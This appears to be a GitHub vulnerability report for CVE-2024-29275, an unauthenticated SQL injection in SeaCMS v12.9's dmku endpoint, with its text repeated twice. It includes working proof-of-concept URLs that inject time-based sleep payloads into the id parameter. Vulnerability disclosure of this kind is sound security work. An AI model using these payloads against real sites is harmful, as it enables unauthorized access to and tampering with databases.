Open Hebing123 opened 8 months ago
SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization.
The following code demonstrates the misuse of the id parameter: https://github.com/HuaQiPro/seacms/blob/ffa00178c7bf966b6bed7109ca76c270eadfeb70/js/player/dmplayer/dmku/class/mysqli.class.php#L287-L305 It is clearly spliced directly into the SQL statement without filtering.
http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(10)))v)&type=list http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(15)))v)&type=list
http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(10)))v)&type=list
http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(15)))v)&type=list
This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the id parameter.
This is the vulnerability exploitation reference for CVE-2024-29275
Summary
SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization.
Detail
The following code demonstrates the misuse of the id parameter: https://github.com/HuaQiPro/seacms/blob/ffa00178c7bf966b6bed7109ca76c270eadfeb70/js/player/dmplayer/dmku/class/mysqli.class.php#L287-L305 It is clearly spliced directly into the SQL statement without filtering.
Proof of Concept (PoC)
http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(10)))v)&type=list
http(s)://ip:port//js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(15)))v)&type=list
Impact
This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the id parameter.